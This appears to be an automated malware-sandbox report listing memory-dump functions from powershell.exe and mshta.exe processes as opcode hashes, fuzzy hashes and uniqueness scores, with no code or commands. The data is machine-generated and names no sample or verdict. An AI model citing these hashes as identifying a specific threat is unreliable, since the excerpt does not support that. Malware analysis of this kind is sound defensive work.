                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                • Instruction ID: 1aac2b9b7e82593c9b295db5398be495c09bbe1ee06e05d5652c4d7508fc696e
                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                • Instruction Fuzzy Hash: 1D90020449540655D41412910C4B36C60406398190FD45480981794144D88D029A1652
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: powershell.exe PID: 1320 Parent PID: 1424 powershell.exeCOMMON

                                                                Executed Functions

                                                                Function 00007FFA372C1329, Relevance: .2, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920262077.00007FFA372C0000.00000040.00000001.sdmp, Offset: 00007FFA372C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6b0301d36d5c1e5a1c1ea27d2f85bf35215072f9cea4db952ec129761b67db25
                                                                • Instruction ID: 30fd7f04c38e897809e8e875619b9224520c52c11d6f220bf449e7fc0c275e65
                                                                • Opcode Fuzzy Hash: 6b0301d36d5c1e5a1c1ea27d2f85bf35215072f9cea4db952ec129761b67db25
                                                                • Instruction Fuzzy Hash: 886109A2A0DB474FF7B993A858531B876D1EF63214B4880BED04ECB5D3ED1AAC019381
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA37201C59, Relevance: .2, Instructions: 172COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56a9b8e4566bf6f84b624c246b5f978888754924194cdcff68a75f24c67afdce
                                                                • Instruction ID: 65335f94f5c0e5715314e298b280c929656d56bb2192221746c72ba1042a7515
                                                                • Opcode Fuzzy Hash: 56a9b8e4566bf6f84b624c246b5f978888754924194cdcff68a75f24c67afdce
                                                                • Instruction Fuzzy Hash: 6251053190CA494FD314DB58D8546A9FBE2FF96310F0486BAE04DC72A2DE29E945C792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA372C1409, Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920262077.00007FFA372C0000.00000040.00000001.sdmp, Offset: 00007FFA372C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f983c2d1a1223250db12e8968d19f368f94b74b61b0fe4228f08db7b5b47da27
                                                                • Instruction ID: cb33d8ab28f8f921b505785827c5ac03dea175cf8e2e05c8fcc376471cc6c7d4
                                                                • Opcode Fuzzy Hash: f983c2d1a1223250db12e8968d19f368f94b74b61b0fe4228f08db7b5b47da27
                                                                • Instruction Fuzzy Hash: 1821D8A2F1DB474FE7B993A8585607866D1EF67324B5881BAD00DCB1D3FD1AAC019341
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA372C0A6D, Relevance: .1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920262077.00007FFA372C0000.00000040.00000001.sdmp, Offset: 00007FFA372C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ecdc9ac9ed107ed0ed9114147b93b0df6762992ec3faf55c1b382ba6a558c16
                                                                • Instruction ID: 963be76d1fc8cac864d146f66a4f35a020b58e1e49b437767d844cbbe98e288e
                                                                • Opcode Fuzzy Hash: 7ecdc9ac9ed107ed0ed9114147b93b0df6762992ec3faf55c1b382ba6a558c16
                                                                • Instruction Fuzzy Hash: 4F11D322E0DB8A4FE7B5A3B81C651B8AAD1EF66210B5C80FAD54DC7293ED0A5C058351
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA37202EA2, Relevance: .1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ed8890beddf27766c38e155016bafab79a9a257ddc3aca3a341e25aaf7ae77e
                                                                • Instruction ID: a601953fa79b24423f0211eef3dcc9c52f819a95e96f3cb5b3784e796d61baae
                                                                • Opcode Fuzzy Hash: 0ed8890beddf27766c38e155016bafab79a9a257ddc3aca3a341e25aaf7ae77e
                                                                • Instruction Fuzzy Hash: 2F01D63131CA084BEB4DAA5CA4925B477D1EB96360B6040AED84ACB297DC22FC838781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA37201775, Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f96e2c40b7d40e547dd598c6f53c6a9b7156275dd0848324181b3c8fecdd3c86
                                                                • Instruction ID: 8e14a0c93c4ca9cb14ada6454d3fef9f3655770558e79b8f32774b4850eaf99a
                                                                • Opcode Fuzzy Hash: f96e2c40b7d40e547dd598c6f53c6a9b7156275dd0848324181b3c8fecdd3c86
                                                                • Instruction Fuzzy Hash: 5001447115CB084FDB44EF0CE451AB6B7E0FB95364F10056EE58AC3661DA26E891CB45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 00007FFA37201978, Relevance: .9, Instructions: 931COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b00821c0eda7e5111c446c8244bba22c239c5a1bed3e6340879ba105a506ae6
                                                                • Instruction ID: 7c12be019fa898d56296ebd560ec352c58b65603f8a6369decf841acdc8f528f
                                                                • Opcode Fuzzy Hash: 3b00821c0eda7e5111c446c8244bba22c239c5a1bed3e6340879ba105a506ae6
                                                                • Instruction Fuzzy Hash: F1424B31A0CB4A4FE369DBA89445675F7D1EF46310F14C57FD08EC7596EE2AB8828390
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Analysis Process: mshta.exe PID: 1260 Parent PID: 3424 mshta.exeCOMMON

                                                                Executed Functions

                                                                Function 05F50FE7, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000003.693120683.0000000005F50000.00000010.00000001.sdmp, Offset: 05F50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
                                                                • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction Fuzzy Hash:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: powershell.exe PID: 5764 Parent PID: 1260 powershell.exeCOMMON

                                                                Executed Functions

                                                                Function 07FF03E3, Relevance: 3.2, Strings: 1, Instructions: 1972COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Sb
                                                                • API String ID: 0-3592133247
                                                                • Opcode ID: 164110244ee94bbb76fd67f98a03f598f81ca11c37569151bbab230340fecfc1
                                                                • Instruction ID: 7addb2a7a5cff590afe6cb488a95b4c17fe7bf8439130a11c5c1c114495556b7
                                                                • Opcode Fuzzy Hash: 164110244ee94bbb76fd67f98a03f598f81ca11c37569151bbab230340fecfc1
                                                                • Instruction Fuzzy Hash: 9F0333B590011C8FDB65DB60C898B9E77B6AF96308F3145E9C00E9B262DF31DE858F91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF0448, Relevance: 3.2, Strings: 1, Instructions: 1919COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Sb
                                                                • API String ID: 0-3592133247
                                                                • Opcode ID: 272677cf66961a1ac9fb4ad7bfa4dabc2f9f1f8b4330a7cc045516f99d220fe4
                                                                • Instruction ID: 993f179fbe826aac4594f812a3ce7bcf0d55753f9fe2dbf7a2efb1046273df9a
                                                                • Opcode Fuzzy Hash: 272677cf66961a1ac9fb4ad7bfa4dabc2f9f1f8b4330a7cc045516f99d220fe4
                                                                • Instruction Fuzzy Hash: 3F0322B590011C8FDB65DB60C898B9E77B6AF96308F3145E9C00EA7262DF31DE858F91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF31A5, Relevance: 1.2, Instructions: 1249COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be2fa45e3681e4a7dcc4f63878262e8d8e9f366387c58bfa4fa3079fb85c7ba8
                                                                • Instruction ID: 489b138bbd888f3657c8976b8b300fe3bfafd044f50eae7c4c816b8ee28d9214
                                                                • Opcode Fuzzy Hash: be2fa45e3681e4a7dcc4f63878262e8d8e9f366387c58bfa4fa3079fb85c7ba8
                                                                • Instruction Fuzzy Hash: 60B26FF5A10219BFDB24DB64CC91BADB7F2EF89704F048499E519AB391CE30AD849F50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08700450, Relevance: .6, Instructions: 634COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5acd3a376b5c18fc2d89143077b1ef07c131e52b145635bca67da6ab0899f2e
                                                                • Instruction ID: 03487a0c8e6c81cb7e719b2ed16a70e6dc88132232d24fdda0792daf948d28cd
                                                                • Opcode Fuzzy Hash: b5acd3a376b5c18fc2d89143077b1ef07c131e52b145635bca67da6ab0899f2e
                                                                • Instruction Fuzzy Hash: 5742A434A00259CFEB24DB64CC54BADB7B2EF89304F1085A9D9097B3A5DF71AD819F90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08704BE8, Relevance: .3, Instructions: 338COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48c5aebf495c9a9e527b16806cec3f91ffd406f0a77f8c7550d706b4fc0dfb42
                                                                • Instruction ID: 3608cc07729aa7eb62a3f11105e0528532ad1cc44d52b21f0e71edbe3f94d8c0
                                                                • Opcode Fuzzy Hash: 48c5aebf495c9a9e527b16806cec3f91ffd406f0a77f8c7550d706b4fc0dfb42
                                                                • Instruction Fuzzy Hash: E9C19D302006058FE714EB74D894A9EB7E3EFC621DB158D68C5058B6B6DF75FD098BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0715C8A0, Relevance: .2, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e97dd1a4a8537e14fc2aa39ce86a9cf7a8516e3a3dc33ae66f37cf889f9a7119
                                                                • Instruction ID: 3c1f92c87acd2c453b9a52f429167c5d2b6eb1e2a701c333d7935395187ad82f
                                                                • Opcode Fuzzy Hash: e97dd1a4a8537e14fc2aa39ce86a9cf7a8516e3a3dc33ae66f37cf889f9a7119
                                                                • Instruction Fuzzy Hash: F6A180B4600306CFE719DF34C4587AEBBF2AF89308F148569D8119B3A5CB75D985CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF8810, Relevance: 1.7, Strings: 1, Instructions: 477COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /
                                                                • API String ID: 0-2043925204
                                                                • Opcode ID: a44a72866b040928bc21202dc18b211b57f4312838604f0f702d3249dfa23033
                                                                • Instruction ID: 25c0d26c0530636e9df5e8c362bdea1a4cc90cfb78528824bfc130e58ff29a3b
                                                                • Opcode Fuzzy Hash: a44a72866b040928bc21202dc18b211b57f4312838604f0f702d3249dfa23033
                                                                • Instruction Fuzzy Hash: 2E0292F0B002069FDB14EF64C4946AEB6F6EF85248F188869D606DB3B1DF74DD068B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0810F748, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910167041.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 7f66773cdcd9770ec373cbb02e8ad1908d240de0f349d3b61bfc990d8c18d0cf
                                                                • Instruction ID: b1e4c6e4fd17203b0847cf16cbbe3190fb429cadc74462cd55e5437fcc4ff45a
                                                                • Opcode Fuzzy Hash: 7f66773cdcd9770ec373cbb02e8ad1908d240de0f349d3b61bfc990d8c18d0cf
                                                                • Instruction Fuzzy Hash: 2741A2B1A00209AFDB10DFA8D845BDEFFB5FF48314F15816AE505AB381DB749941CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0810F7E8, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0810F767,00000000,00000000,00000003,00000000,00000002), ref: 0810F872
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910167041.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 890c4cbcb5cc66ae3e786bda26bee7063328deb21861f322f05616a79f6e72cc
                                                                • Instruction ID: 958ff4053ce8df8c89ba12b5fd1ae67139ea8ed71ef1e0a69a623752aa8f2e84
                                                                • Opcode Fuzzy Hash: 890c4cbcb5cc66ae3e786bda26bee7063328deb21861f322f05616a79f6e72cc
                                                                • Instruction Fuzzy Hash: 002145B2C00209AFCB10CF99D845ADEFBB4FF08324F00812AE915B3650D774A950CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0810F28C, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0810F767,00000000,00000000,00000003,00000000,00000002), ref: 0810F872
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910167041.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 6a3b38c6d887e7674ccd2fcd0ee456ad0e85fca925225f9b2cd2f2128330243e
                                                                • Instruction ID: 26b079e79b8c9f25314e97df31e3424aa42cfae59d1135104caa23577d5d8508
                                                                • Opcode Fuzzy Hash: 6a3b38c6d887e7674ccd2fcd0ee456ad0e85fca925225f9b2cd2f2128330243e
                                                                • Instruction Fuzzy Hash: 372125B1D00219AFCB10CF99D884ADEFBB4FF08314F10812AE915A7650DB75A954CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF6619, Relevance: 1.0, Instructions: 970COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c55c2213730f929aa4214a24343bb0ccc9498c98346e37c47fb4430c30cbb4f6
                                                                • Instruction ID: 7a77cfb0dfde436ddffcfe95187058a596635aab1c2f37625c5d9a3588ba6a34
                                                                • Opcode Fuzzy Hash: c55c2213730f929aa4214a24343bb0ccc9498c98346e37c47fb4430c30cbb4f6
                                                                • Instruction Fuzzy Hash: 538248B4A10255DFDB21DBB4C884A6DB7B2FF49304F288559E6019B366DB35EC82CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 087062A0, Relevance: .5, Instructions: 494COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55070a9c11a7d64eeb19b35cb5a0a684bb2fab07f6c9b9c36909d369d73d881f
                                                                • Instruction ID: 291ad5b92f66869a55e7989ae11052933fcd7830cc42ec120f71aab6c4c55810
                                                                • Opcode Fuzzy Hash: 55070a9c11a7d64eeb19b35cb5a0a684bb2fab07f6c9b9c36909d369d73d881f
                                                                • Instruction Fuzzy Hash: B2126A74B00204DFDB14DB68D564AADBBF2EF89215F2541A9E402EB3A5CB31ED41CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08707D18, Relevance: .4, Instructions: 437COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 386fd4ba5d412004e2a98c4b235252c53016a57ea4031ed05f65be1a17607c73
                                                                • Instruction ID: 43db11d7392994037885551c45646ebb8e8e352ada5443d7846e00acd5aa5c5c
                                                                • Opcode Fuzzy Hash: 386fd4ba5d412004e2a98c4b235252c53016a57ea4031ed05f65be1a17607c73
                                                                • Instruction Fuzzy Hash: 34F1AF74700204CFDB24DB68C894A6EB7F2EF88215B19896CD9069B3A5DF35EC41CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08701740, Relevance: .3, Instructions: 346COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74056dee09a958d7de89ebb7e957384614bc77900ff27c42fd3fe88ef88dcca6
                                                                • Instruction ID: 9dcd5b6f043bcb1e4b55ef488a008571d62f3bdd16d3c9d1ab6017fa242e4687
                                                                • Opcode Fuzzy Hash: 74056dee09a958d7de89ebb7e957384614bc77900ff27c42fd3fe88ef88dcca6
                                                                • Instruction Fuzzy Hash: ECE14C30A002488FE710DBA4D058BAE7BF3EF86309F55C469D0055F2B6DB35EC469B65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0870D976, Relevance: .3, Instructions: 325COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bfcd1a89894d1e0c8e6effb3bfaa3f99f6ef715f859edea2dea8766832b8397
                                                                • Instruction ID: ce9df537a84561acf092e9fb98c471c0c67ffebbf064f6f6048c07de485d4c33
                                                                • Opcode Fuzzy Hash: 5bfcd1a89894d1e0c8e6effb3bfaa3f99f6ef715f859edea2dea8766832b8397
                                                                • Instruction Fuzzy Hash: 0ED13A79600109DFCB25CFA4C88899D7BB6EF88355B214269EA069B375CB30ED81DF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07156CB0, Relevance: .3, Instructions: 318COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 731add502a435899a39e4303aa68b06f14dc1c3d021b9e62454b24b959679983
                                                                • Instruction ID: db82d0138b8c3008807fd2a41cff649e84d23025bbb90b81ec539b4d3236562c
                                                                • Opcode Fuzzy Hash: 731add502a435899a39e4303aa68b06f14dc1c3d021b9e62454b24b959679983
                                                                • Instruction Fuzzy Hash: 28D18F74E00209DFDB05DFA4C454AADBBF2EF89308F158869D805AB3A5DB35ED45CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08707830, Relevance: .3, Instructions: 292COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4e5090444e42603f5a6dcdd4b3ca43f8e92eff6ca2c9798c32d5ee6f4085259f
                                                                • Instruction ID: 5f44956cbfc066a9ebc78727117ed1c277b047eaa4c55b267cfe6dccd1a6e121
                                                                • Opcode Fuzzy Hash: 4e5090444e42603f5a6dcdd4b3ca43f8e92eff6ca2c9798c32d5ee6f4085259f
                                                                • Instruction Fuzzy Hash: 35A1B0757002408FD709AB78C858A2E7BB7EFC9615B15806DD50ADB3A2CF35AC02DBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFDC90, Relevance: .3, Instructions: 282COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18d4173e595eeba359052a1f8fc9632523c158d7ac3a38a7f560e9e228f6d363
                                                                • Instruction ID: a114f62c95147a2f5db0299a3df6358357c8a7227d6ff129155f60d93ff2df34
                                                                • Opcode Fuzzy Hash: 18d4173e595eeba359052a1f8fc9632523c158d7ac3a38a7f560e9e228f6d363
                                                                • Instruction Fuzzy Hash: A1B1BD747002059FE704EB74D494BAE7BF3EF89308F258869D50A9B3A1DF75AD018BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFA4F8, Relevance: .3, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9102dd59e2fab68a3a2c8d2727ab19eef6c6f96db869e4335d53d3e1da1743f9
                                                                • Instruction ID: 61e5b16f47626753cce1e13e847e6eadce4f29b78deff741933d6f05cfb4b4ab
                                                                • Opcode Fuzzy Hash: 9102dd59e2fab68a3a2c8d2727ab19eef6c6f96db869e4335d53d3e1da1743f9
                                                                • Instruction Fuzzy Hash: 3CA182B4A102158FDB18DB75C4947AE7BF1AF86304F19C82DD606AB3A0DF38D841CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF5448, Relevance: .3, Instructions: 251COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da83ee9e206abe1800f812cbb45c0261f3dcc11625a6d2ef4c7faea97efa61b8
                                                                • Instruction ID: c9baf61a35c15033b94d7e7c81ed3e6693dd02d1f06b17ca9c3a40e7a3df0dde
                                                                • Opcode Fuzzy Hash: da83ee9e206abe1800f812cbb45c0261f3dcc11625a6d2ef4c7faea97efa61b8
                                                                • Instruction Fuzzy Hash: 2691C071B002448FD704DB68C058B6EBBF69F8A209F29C4A9D409DB3B6CF31DD4697A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07156CA1, Relevance: .2, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e463f28cda5ae826b33b5a81dd8b188fab97c802952bc164388cdf25cd20786a
                                                                • Instruction ID: 2583d3e5da2ec2f88ca0d2926f53c4e9ad612074912f8ea75790975cc8538672
                                                                • Opcode Fuzzy Hash: e463f28cda5ae826b33b5a81dd8b188fab97c802952bc164388cdf25cd20786a
                                                                • Instruction Fuzzy Hash: 1AA16BB4E00208DFDB05DFA4C494A9DBBF2BF89314F1484A9D815AB3A5DB35ED85CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07156C81, Relevance: .2, Instructions: 224COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 71045307dbd0c95a68ec8ff9b51da14f80559357118bfbcb931c905cea1c3f0c
                                                                • Instruction ID: 52110e79e53c0f9f5d2e7957f12c232b2e1b46de429ec4bf6770ed8f6dead51a
                                                                • Opcode Fuzzy Hash: 71045307dbd0c95a68ec8ff9b51da14f80559357118bfbcb931c905cea1c3f0c
                                                                • Instruction Fuzzy Hash: 32A15BB4E01208DFDB05DFA4C494A9DBBF2BF49314F5484A9D804AB3A5DB35ED85CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 087069C0, Relevance: .2, Instructions: 220COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 868e1fc1c2ac2a6a30485f796b023db936741452ea2577282167158efea9b940
                                                                • Instruction ID: ae2b2273794882dc40e3825d065016b1c6300849d853e96389b7274c613a3ef7
                                                                • Opcode Fuzzy Hash: 868e1fc1c2ac2a6a30485f796b023db936741452ea2577282167158efea9b940
                                                                • Instruction Fuzzy Hash: 31918E75B00314DFDB10CB64D844B9EB7B2FF88715F158548E905AF296CB71AC82CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFED70, Relevance: .2, Instructions: 213COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24564e283e3e31d60235b159fa8c9ba58f0d733fae808fc78ca64848b79332d1
                                                                • Instruction ID: cdb859de60cc9d9542c392675b0d970686b1aa14badc4d4f5cfa0859279175fe
                                                                • Opcode Fuzzy Hash: 24564e283e3e31d60235b159fa8c9ba58f0d733fae808fc78ca64848b79332d1
                                                                • Instruction Fuzzy Hash: FA614874B002445FEB149BB8D8147AE7EE39FC9618F15846DE506DB3E1CF389C058796
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0870D7A0, Relevance: .2, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a74ab797bbd4970ca287d4a8c3fd3c658feadb5f15822ffad8223431dbf53ac6
                                                                • Instruction ID: 1040a82a3f6cc695e4fcde9524f6ad64e3e105834a80a77798bed4829f8399f0
                                                                • Opcode Fuzzy Hash: a74ab797bbd4970ca287d4a8c3fd3c658feadb5f15822ffad8223431dbf53ac6
